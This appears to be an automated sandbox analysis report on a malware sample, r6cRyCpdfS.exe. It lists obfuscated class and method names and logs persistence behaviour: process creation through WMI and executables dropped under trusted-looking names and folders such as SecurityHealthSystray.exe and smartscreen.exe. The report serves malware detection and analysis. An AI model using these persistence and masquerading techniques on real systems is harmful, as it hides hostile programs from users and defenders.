                              Source: r6cRyCpdfS.exe, iHdGhxdeU7QKSU3awAq.csHigh entropy of concatenated method names: 'IX7dax6JQ3', 'qgjdp7FaLt', 'xwGdz6Z9ZY', 'x4aGtB4tuT', 'SXZGwknyOV', 'qc8GceX9gv', 'tS5GK0QeRM', 'n9MGsel36R', 'QKtGSrbHEQ', 'tXAGXs1ftO'
                              Source: r6cRyCpdfS.exe, oMqwIv3BnoF72hOj4Z4.csHigh entropy of concatenated method names: 'C5K3mu2cie', 'rDe3eoEC7y', 'gk43obnYpw', 'nS96UlwYhPhIOc9ahrkC', 'LGMrrUwYEXTuQYZw03UZ', 'Ty0vAMwYBFE543A64f03', 'RWG2XpwYmS30fHtuXorW', 'XHgdgIwYemfOv9AmppYB', 'P1XdytwYoPxlTl1hn2xu'
                              Source: r6cRyCpdfS.exe, HkidCA1BFsT6cAmCcnn.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'h9DwHP3XfH0', 'NSYwsuKAnRf', 'mTiCPEwG0duOi8MnvMq8', 'lG3NgJwGDxenKZLqWSgS', 'MuJcLhwG28m5B7H5FKMv', 'ToKtWewGP9I3pCOhkmpj', 'Pl0YtewGVnfd7VCksWjE'
                              Source: r6cRyCpdfS.exe, xZUmOZgpFCjroMdVRY6.csHigh entropy of concatenated method names: 'WkYxtBqflD', 'uccxwnbOZG', 'AWtxcW9Eqk', 'ztgxKnH1p8', 'zsNxseZkdZ', 'cu4xSolpa4', 'cOcF2rw9CHTDh9M6nPm9', 'Pdp65Xw96DOJpQKowEF8', 'cDNolOw9qwtBC1BnNlnj', 'WItlivw9Y4H3V7pWbyHP'
                              Source: r6cRyCpdfS.exe, bodeigMDj72YPCxrj1w.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'ayZwH844CNa', 'aqRwHiCxd6g', 'wNpLuqw6Yf3jrCyGXe1E', 'gU0M1Iw6uw7FFoyoWaUX', 'KeWQjrw69lcevtP4AKhU', 'ID19MMw6AAxJJKpfHtnc', 'VtNlTYw65O9iAE1SmhSm', 'I4oxkDw6TA9ulhUpXp80'
                              Source: r6cRyCpdfS.exe, FKtICJUpHng2u2SMb9v.csHigh entropy of concatenated method names: 'aymytkwYNh', 'Tr4yw1yAR7', 'Yd7', 'S4dycO2cSM', 'PybyKtbqAA', 'gNHysiTt5p', 'ioMySL59L7', 'nn4gOcw5nYDPlZiF2evi', 'Up64ybw5dUb5o3PULroa', 'DLKfD1w5GfTSMjmvj30E'
                              Source: r6cRyCpdfS.exe, VFMXpnSkyBiQPcyt8ws.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'iHTwsDdEhn8', 'YiFS4WFoX1', 'imethod_0', 'fhj9pFwynboMwtv5DyDm', 'IVQ5g7wydnPR0sF1NYjM', 'VRSOjXwyGj9PGGJJ5s6R', 'uvoaeowy6CMNpuGk9qIQ'
                              Source: r6cRyCpdfS.exe, PsZ5F0adamOS4bxqrpn.csHigh entropy of concatenated method names: 'BJYwXfbspEk', 'ztEwX7R09lq', 'W5OwXk4xJHy', 'ka1wXOwQTE4', 'YHOwX4KImmC', 'Wy6wXL7IL08', 'lbEwXn3qnVe', 'deHpSEgUjH', 'W40wXdXLHTA', 'R8ZwXG5nBVX'
                              Source: r6cRyCpdfS.exe, G6fYwfKR3HvBtdA2OQK.csHigh entropy of concatenated method names: 'mMqKqGygmf', 'ayHKC7q8VE', 'FUQKYAcT7j', 'OjlH1LwxYTXmPnU2bFc0', 'yQAEcBwxq7MsE5RZyYaE', 'JAmrujwxCItRqEVZnf7t', 'yEeKgTxREE', 'aC1KxxUm3e', 'bKsKUc3hLD', 'jiQKygfkOL'
                              Source: r6cRyCpdfS.exe, yRqqBEwpSBRvYupAyru.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'm11wHwLvR4g', 'I76wswVNlxN', 'zeTBqywvzSy4FKqxpOBn', 'SpYOLpwgtPuCF0Skcorj', 'eH9g13wgwwAISSR6fYWl', 'dStLC3wgcPrmGm2mZsIL'
                              Source: r6cRyCpdfS.exe, hUHW7j8PZA7Kl6a4bad.csHigh entropy of concatenated method names: 'xUrbwSph2V', 'pqeek5wCJnFrJmdYDRcL', 'b4VZ1swCjiHpIV2yr6ol', 'C0xfVowCZb10GQ62rZJZ', 'OUl8I0EjDd', 'Arc8FJRehC', 'WmD8JZwNSj', 'PYF8jjrcLJ', 'YX68ZQdQme', 'B1a81xNefY'
                              Source: r6cRyCpdfS.exe, fvsJ07RDhmoS2dxYlbJ.csHigh entropy of concatenated method names: 'o9bRPGsBso', 'akyRVf2D4y', 'Q7IRIya3wX', 'BwGRFcU5Jc', 'Aq0RJUIkB7', 'VLDOyQwutIaSFyIdk0mx', 'ogUgq5wYpsVUFN2lp3qn', 'g5S1ZywYz90qt2SQJKPH', 'DiPQLZwuwZ8177J41v3t', 'v1ULBAwucIYat2M1NFUT'
                              Source: r6cRyCpdfS.exe, xAbEYGmPUA6WwU9tDwR.csHigh entropy of concatenated method names: 'YkCmFKFSwK', 'TGam19F1eI', 'JMhm8gSqqO', 'FYgmihCpF9', 'oSmmbDbQdf', 'l4EmWvHU1K', 'FuZm3dbE1F', 'LdBmRPkcMH', 'Dispose', 'kyL6toweBjtR4XxwgCYZ'
                              Source: r6cRyCpdfS.exe, zYt45QUsPdbhQg6Vf64.csHigh entropy of concatenated method names: 'pQ1UXTLdS5', 'B74UrGWBfs', 'VK8UHr7jmo', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'BgOUlP85PY'
                              Source: r6cRyCpdfS.exe, eYG0ReSCCGuDI2RPypc.csHigh entropy of concatenated method names: 'fp8S5Za0oo', 'umqdCjwftN44gjtbJy0V', 'yEbPULwypvcrtwuQXIuD', 'otdIRkwyz6DaPkehhhEP', 'C5FTeVwfw6dpywMf1k7e', 'kfdxWqwfcoQHyFRhonjr', 'U1J', 'P9X', 'zKywsFdHhml', 'VMZwsJFu6Zu'
                              Source: r6cRyCpdfS.exe, Vn74UDzeYvj7Rp5W73.csHigh entropy of concatenated method names: 'p3EwwDFZTS', 'zBGwKstOSN', 'r2cws2JZSh', 'nnwwSjJSGN', 'K07wXpcnv8', 'dZLwrkWhph', 'DpFwlMRm5t', 'T1IRRbwvHXCMvtxoCsmi', 'DD1QD0wvlZmtqAc1SfqV', 'YsCJi5wv07Ro2uWYCKqx'
                              Source: r6cRyCpdfS.exe, Qt34rAHJ3wPFBncu0y9.csHigh entropy of concatenated method names: 'TZuHNGRamt', 'eJWKHowkxOrNQ5SeHeGw', 'IQMnO3wkvKQRcjogwhL2', 'l3js3jwkgWX3aqgpyWxC', 'juGEqDwkUJGt3Sl4WwYI', 'yNQHZj6lW4', 'VdSF77wkiHWFloW0W8EZ', 'GZIc27wkbiuE0ju35GwF', 'mA2XiDwkW54ERkTNk8bW', 'KMDm06wkMnfH5YqdTnin'
                              Source: r6cRyCpdfS.exe, aieljlyHw6af8emRP8g.csHigh entropy of concatenated method names: 'Nliy0WZBiv', 'DQdyDf0RDF', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'rn2y2birxq', 'method_2', 'uc7'
                              Source: r6cRyCpdfS.exe, JcNt5tSdknTQ4s3vUGL.csHigh entropy of concatenated method names: 'q64', 'P9X', 'KDWwsVTrxwI', 'vmethod_0', 'H6FwHXL5mqW', 'imethod_0', 'k5jXmKwy9kMImX1gEf8k', 'o7FhX9wyAliHoieRduBi', 'HV1bhiwy5CLlgbtZ0F3x', 'KHqNkCwyT8hgIeS4SOrf'
                              Source: r6cRyCpdfS.exe, ds2CZcrlcEZEjIZxXNq.csHigh entropy of concatenated method names: 'Q7drDLdWa7', 'ctrr277Kew', 'rCJIU6w72HtHquNwatTe', 'ebVbrsw70LImakFrae4q', 'EA6sy9w7DUAPLZA0BXrk', 'uJd1unw7P1gmDCybr7n2', 'MHuaS4w7VKF8kLbDlCR0', 'bHsAhlw7IQ9Ej4kS48bk', 'pslIFLw7FwvU5mgvo3VR', 'Ko4QxWw7JcRSeV2u78eC'
                              Source: r6cRyCpdfS.exe, yjsYNoMSfM4kLhUs4Kw.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'yCiMrHpxt2', 'vmethod_0', 'CB8MH3hm0S', 'zTQwHMrmqAg', 'PYFbfOw6n8jo0YIWrDWi', 'zYQbPWw64wKExsVJc1d0', 'nfAKJlw6LDqeDDQET0f1'
                              Source: r6cRyCpdfS.exe, ANBsA2nl4iFqBF8k4CU.csHigh entropy of concatenated method names: 'X4GnWEy6J5', 'PhyoxJwEhORM6oAqu3Je', 'jDg4k2wEE3TXMklWjKI1', 'phxCfdwEBh31hLKXHUPx', 'X9Ls1kwEmQ7EOESXlppA', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                              Source: r6cRyCpdfS.exe, jMb7Ap7TA3tVP6UF7cV.csHigh entropy of concatenated method names: 'e947ElsqNO', 'k6r', 'ueK', 'QH3', 'NEo7BIVtVa', 'Flush', 'vue7hV1T40', 'VJD7mV9BlI', 'Write', 'dqN7eaDREd'
                              Source: r6cRyCpdfS.exe, ujLYOmH06wiI9EjgH3q.csHigh entropy of concatenated method names: 'vGsH2BDA3Y', 'POyHPEfOrJ', 'MUQHV9vtro', 'EmL79iwkJ4sMQbFZhTwd', 'A7Kc43wkjQFtKOd6ZB7w', 'CGnG0HwkICmJAiRP1SYw', 'y3H0EMwkFFWZtalOtyuT', 'ubRo4UwkZY4HXdiY0JiE', 'WV6a0Awk1F9r2abk6w7J'
                              Source: r6cRyCpdfS.exe, n6IFG9X6WWZUCxGpQVW.csHigh entropy of concatenated method names: 'jeGXmP6cIv', 'DKlXeSauha', 'kFTXoeXdvR', 'FHKO7Bwfpsl3dbi4A1g8', 'bb17VuwfzZ7TtQixKVi4', 'ln12xHwfo0vYcXP4j1mo', 'CwqmJ3wfayFKvd3HiYup', 'J9yXCbarlm', 'MxSXYRBbxx', 'i9UXuqbMx0'
                              Source: r6cRyCpdfS.exe, IDBcQFMFFkK13C4l6tQ.csHigh entropy of concatenated method names: 'BYnp8dwq05E5kbfU4k93', 'UUIODCwqDW4uFaCAVOif', 'fcpdCwwqHtrs3N1RJEbd', 'qqPrJLwqlrbtSnUIsdnI', 'method_0', 'method_1', 'AvwMjaaXy1', 'DDNMZowpNU', 'lftM1j6WSm', 'SBGMNyaLqb'
                              Source: r6cRyCpdfS.exe, H7BWCQcSwNlGwaENo4B.csHigh entropy of concatenated method names: 'QnNcrMRKNC', 'mo0cHD6RGp', 'edUcl2SADH', 'b8Kc0dUuov', 'LlmUVJwgI6LXm45Txu6C', 'C90Ol4wgPEkkAQa30R8M', 'I3uBqNwgVF8dbwekV6Zf', 'NcFS9EwgFhZVDdNKjj7T', 'adoIYfwgJ4KWYqPfHmwD', 'wHJ6hiwgjmBwo1A8fncx'
                              Source: r6cRyCpdfS.exe, myUInhnyROhXLXmfKEa.csHigh entropy of concatenated method names: 'rBBn7h2TXL', 'mWdnkGcy8M', 'FaXnOlVYuW', 'aDIn4W1tuu', 'KLvnLFAyky', 'nXmnn11cgi', 'LX0ndTvhxH', 's75nGFM0Ib', 'faKn6L3JsG', 'PfLnq91ODP'
                              Source: r6cRyCpdfS.exe, fTLkSWGO5YEwXPPO8m8.csHigh entropy of concatenated method names: 'qBFKMBwhvJEDHnCUp7aS', 'RQ47ISwhg0E3tLQRE4MH', 'zI9qqOwh36moqGpQL0QR', 'eYAiFZwhRarpLmb8SaR2', 'LOPJFrwhiVSE0udKXmab', 'EN0CbdwhbJQ5OsNY6JLk', 'v3U3MgwhMM34tU1OX9gZ', 'mRZGTSwh8MckZoyJpWtt'
                              Source: r6cRyCpdfS.exe, FqYM6gfM1giSp10LX7H.csHigh entropy of concatenated method names: 'Jh77Vsx1j6', 'kdrtRRwTgg52P3fGyolF', 'FCMBpmwTxWQOIxRkkbVv', 'VG3hhowTUWFfbFaHsPUk', 'kt5', 'w05fi5uIq9', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                              Source: r6cRyCpdfS.exe, mH94MBXkQ0ukn99XBlY.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'yNdwH0M2egS', 'I76wswVNlxN', 'YgKxvtwfn7aJvRoWveS6', 'GKQiOIwfdu8ocihR0lAI', 'rlMOw4wfGh6ugasFxxL6'
                              Source: r6cRyCpdfS.exe, uEFmGISll7NspgHFvaH.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'F3twHSv8RQZ', 'I76wswVNlxN', 'e7FEICwyFfHHhQbYtlew', 'sfkepCwyJVl4U7HdC63V', 'TQTldVwyjF9jVaJPtWX6', 'YZNqGowyZCY1gPntI4ny'
                              Source: r6cRyCpdfS.exe, vMyaM5CjpAQV7G3WU4.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'Jntuh3N9s'
                              Source: r6cRyCpdfS.exe, QpfhELgEoakTAOBksSa.csHigh entropy of concatenated method names: 'LbughJZmbS', 'xaWgmIXSd8', 'ygmgeTdYhl', 'nebgo7uPXD', 'G3AganGwUA', 'sdy4HAw9OAQqT8rKuH6j', 'd3g9P3w97d69yU4U9hGj', 'k6B8MJw9kWePm2YLArZ4', 'mlBINNw94HxJUWyRrUXF', 'IYAPaRw9LIIHGpW5QRS5'
                              Source: r6cRyCpdfS.exe, De0B7YwBshDPf4LMLjk.csHigh entropy of concatenated method names: 'P9X', 'wUmwmp3Esb', 'hFbwHtZyITm', 'imethod_0', 'JTewerAaTM', 'WAvMlAwvm2XP49O1nhe0', 'IwRfRUwvBy5NanY29quO', 'Rv5BRqwvhnau0rbmlDcx', 'obBTdawveWabEfR5JncG', 'aMELGZwvonOZiZsa4K14'
                              Source: r6cRyCpdfS.exe, KkH9tQHunK6wic9NiBx.csHigh entropy of concatenated method names: 'Bx6HmUw6lo', 'jpd7fZwOSauCTlw2k7af', 'KghvtEwOKSZNOiMFeySe', 'FhZqjKwOsXJ32X6lTVng', 'wHvfeUwOXtZC1TcQTBJU', 'abAhvKwOrXxJ4KwojxdL', 'P9X', 'vmethod_0', 'HHFwsvpDwpJ', 'imethod_0'
                              Source: r6cRyCpdfS.exe, P5JXi7b0lBlUXaAc9v1.csHigh entropy of concatenated method names: 'PkGby22k6Z', 'B3db2eAElQ', 'LhkbP6KaJ9', 'OwubVd2ek0', 'k3bbIMQy2T', 'wGhbFVkWP8', 'kvnbJECsD1', 'MwJbjIQ9j5', 'h6AbZG4xX9', 'IZOb1t5aB8'
                              Source: r6cRyCpdfS.exe, mhexculVKbdvQjnBiyl.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'R5p9X3wOUpqrGaWeybLk', 'AI0jagwOymKOyErFsq9L', 'wMu2qXwOfEpETUKLr2u1', 'CkwSNdwO7j3HvL4xNj8U'
                              Source: r6cRyCpdfS.exe, LmRHWZwZrXJ2hNjFKaG.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'vJEwrzLm2JW', 'I76wswVNlxN', 'g4JIqnwvbaGxjJpCj5fO', 'z7uuMXwvWIn1Jr3Wq7II'
                              Source: r6cRyCpdfS.exe, woalRtwVImpOWBkRweT.csHigh entropy of concatenated method names: 'rGGwFqL6qG', 'JX4wJqaCR7', 'rhvwjEoe4g', 'k3IgmNwv1w9p8CurHc1N', 'B2yArewvjS6yki0M3qNp', 'P08KJGwvZV0rduXVAweQ', 'YxfgoAwvNMxS82TUipPh', 'I2loLBwvMpn9yshqneHM', 'yWvJnIwv832oTtMPgGSl'
                              Source: r6cRyCpdfS.exe, n4mi2AXWKZUmANmWvCc.csHigh entropy of concatenated method names: 'P30Xy0VsyU', 'wIHmUFwfOmW4UHoxQyPJ', 'FFvPPXwf7n9hNprRMnb2', 'ylnO5iwfksdfi4C0fesy', 'eo48dawf4gbbV5o8XGmY', 'E94', 'P9X', 'vmethod_0', 'rT2wsNeCtIr', 'QQ2wHlaAE83'
                              Source: r6cRyCpdfS.exe, LLU7oCaZQ2yNlY6NlvY.csHigh entropy of concatenated method names: 'oxUaxAKwrZ', 'TkxaUp03Ld', 'oHQayp2M6S', 'tV1af3Sy0u', 'zG2a7dc6V9', 'lo0akcO0OD', 'B9VaOYVSyT', 'X5Ba4rdCtZ', 'BlWaLdtifO', 'PTRan3lWdl'
                              Source: r6cRyCpdfS.exe, RvRqdY1ncB1OdlWN7vm.csHigh entropy of concatenated method names: 'w9l1uoqncX', 'Icl19BRQXu', 'IZt1A0wu08', 'Rc5nYpwGtv0RvX0V6ydO', 'T4WwtfwGwSfyENvcBq9J', 'mJJ8d4wdpl7rwQp2GYwA', 'QpPPt9wdz6Zx4OGlOQ8l', 'nW81GE52GV', 'QrN16OEAgl', 'lt91qtQQxk'
                              Source: r6cRyCpdfS.exe, QDON0yUYN1PB3fBbLNl.csHigh entropy of concatenated method names: 'PP4U9UxqXX', 'tPkUA8FGRv', 'ERfU5RHxJ9', 'QxaUTIHdhQ', 'lp4UQRyMJf', 'mwDIaow5xlnce4TbURKA', 'pFJA17w5UvMC4aKaovuG', 'nn7YPrw5vGAoTuWMtlL5', 'XZMgKVw5g8MwJ0m35I9V', 'CNkwaew5y0tnd71Nk1E2'
                              Source: r6cRyCpdfS.exe, HQ89gWKTPUvuUijvwhJ.csHigh entropy of concatenated method names: 'iEtsKcOItD', 'rk1ssDONaE', 'gYasSoE0B7', 'qdx1mtwUSy0D30XJFR44', 'y8LIcowUXLdlLZMKMwVn', 'yVXipjwUKqDNlS0PhKKI', 'URHChgwUsZBJoYb6o1n7', 'bOWsDpnPRh', 'JJ3cKxwUHORmfKcwSNpo', 'BfNi5EwUlAZ1veOh0VAi'
                              Source: r6cRyCpdfS.exe, ASEkhmdyL5DU99L124s.csHigh entropy of concatenated method names: 'lD4d7Vy1JI', 'RgGdkFjCyY', 'gtfdO1fVSv', 'gVGd4oWuBe', 'pLrdLATXIh', 'rg1dn4llx3', 'ktVddO6Slw', 'PrVdGLACmo', 'DSBd68GwGQ', 'i1AdqSvblN'
                              Source: r6cRyCpdfS.exe, kmsRjblbeVwl5LOuMVB.csHigh entropy of concatenated method names: 'xicHECwLyh8nH6h46Rig', 'zhKfcrwLx1WkUILZVTOL', 'yFvX6MwLUMKWUwylbToW', 'JjHVpoI2eO', 'UawjmRwLOH2P4Ehrb1qw', 'FxhgMUwL79lE9xjgUpkU', 'MNdyt6wLkj1QQTDgeEvD', 'O3ix8rwL4XIvE6kk8VLa', 'UbtX7xwLLDX2Q4VkmxN9', 'IMyIwI3xo7'
                              Source: r6cRyCpdfS.exe, X82QctcIwC2EQe6PkY8.csHigh entropy of concatenated method names: 'UhHcJu1Grg', 'vTacj4Jxr6', 'HnAcZB9vuV', 'CbSMK0wgNbt1pGfnNsZI', 'y0vqrIwgMcUVBjUysRPe', 'Nb0jZFwg8miWkRSmITNZ', 'dXgA1ywgiGKs4nsWomTy', 'B9I2M2wgb0EYi2bjg48J'
                              Source: r6cRyCpdfS.exe, R9W2MBgu8X7TULWMyt8.csHigh entropy of concatenated method names: 'LTKgAo5N35', 'yULg53rfdB', 'xXtgTaUn6B', 'EXYw8Sw9g5QRc7mDihTX', 'c3nq90w9RhXvgN5CpR3p', 'g9QRpFw9v1ENfndj751y', 'CJloVDw9x7b3j54nH13d', 'bMuHnaw9U9r8DtGbMb2R', 'UUDO5Zw9yW8bOhmiH2Jd'
                              Source: r6cRyCpdfS.exe, nWoS88j9nkO2HQOES2.csHigh entropy of concatenated method names: 'smtkd4rJ5', 'jqVXcVwRyBeWnTHZonU5', 'p84Uy7wRxJXSmhIPkuII', 'cmg62QwRU4Ec1QVS9oIZ', 'YU01r2pYV', 'PPLNkPl7p', 'o5KMxrNpn', 'zSu8yFwOl', 'qxWivZT28', 'UVdbldFm9'
                              Source: r6cRyCpdfS.exe, rWFU2wnYZCV4SxgB6sC.csHigh entropy of concatenated method names: 'AZGwHWgYDCv', 'A10n9knLDx', 'roQnAD0pem', 'zEqn5BxId9', 'KbbpHKwBXE5XkIBI0tHl', 'FEr2GUwBrNx3MrppZ2Kd', 'xriAQVwBHXrI8owExjaQ', 'agstDnwBlOBsAanXejBs', 'efR14rwB0wnSxwWPtqU4', 'ngQxH7wBDVZP95wPnCuA'
                              Source: r6cRyCpdfS.exe, nWhKsusdem3jxZwD7MK.csHigh entropy of concatenated method names: 'pcmsaoLe3g', 'vjjjIpwys9AtV3IlQRS8', 'RSfhatwyc1NoYojLUoTn', 'uBURlxwyKMo7xUAUhiyj', 'rffaPEwyXNuv9xn5sD7i', 'xYBrBAwyr211FjFcnF9X', 'sEQSXd2UKt', 'lu2HHYwyDPDjSQJm3Xxa', 'eHDRonwylyTmS6VGdsrh', 'eTnsYfwy0FT4xaAvxBfX'
                              Source: r6cRyCpdfS.exe, vXTdaINmDGYcpeE2GYN.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'GqhNoxF6CU', 'YRYwHZwUjiV', 'G25Zirw6bafkDqX86v63', 'yr7dBBw68fULgqC8myCL', 'R9CkpAw6iI4gZ9LOkI0K', 'E0T6Unw6WAeJNA10jByk', 'mpdcDbw63VxgdhXAuoYr'
                              Source: r6cRyCpdfS.exe, wP2wAYcT7vygPmqGu8T.csHigh entropy of concatenated method names: 'uibKropm4X', 'z0CbuewxtreLfOtArLB0', 'wdgO3bwxwbZdlRN092g9', 'hgjohfwxcNIs5DLENLbG', 'EQJNJ5wxK62Nmk2jE1jq', 'sdIXUVwgpGXx6hZsJog1', 'nsHUHcwgzqTsEqBHmS9O', 'JvGfnXwxsyIoRQW5Y7b3', 'm7TnXAwxSIIhfN0wA9cP', 'NLhKt8ROhi'
                              Source: r6cRyCpdfS.exe, lYZ9pMIigvwl8VY1jrx.csHigh entropy of concatenated method names: 'mTa1PWPAP5', 'gBP1V4M0iW', 'SQHKNpwd7uVYFsIJLAR0', 'SJcKqowdyUEjFgx8wnyj', 'PTwTfxwdfmd4mNT1RMIb', 'SsNNsKwdk3BI8vP9W165', 'D07RnxwdOsYkR1ckaSkY', 'A6m11se9Np', 'VHRfidwdLhdNKs0KAeEO', 'ibdXNIwdncUP5dAwmUPj'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJump to behavior
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\JVTxIHOe.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\LVAfadhu.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\wBUQRRyD.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\jaFJWeGx.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\dzjCIUvL.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\CdKPGOIP.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\rrkZaPzN.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\GzqyMBLI.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\PLrVhZhn.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\SChMoWhg.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\TmfudOZJ.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Program Files (x86)\jDownloader\smartscreen.exeJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\vCoIsDxd.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\yEaqNnCZ.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\oVHaeKwr.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\dQqVXqpO.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\XOqvKXRc.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\TJxnsSJM.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\WudDzgUF.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\oGFJTCoU.logJump to dropped file
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile created: C:\Users\user\Desktop\FlHYcgCL.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\haYbFIoh.logJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile created: C:\Users\user\Desktop\AaEpKsEu.logJump to dropped file
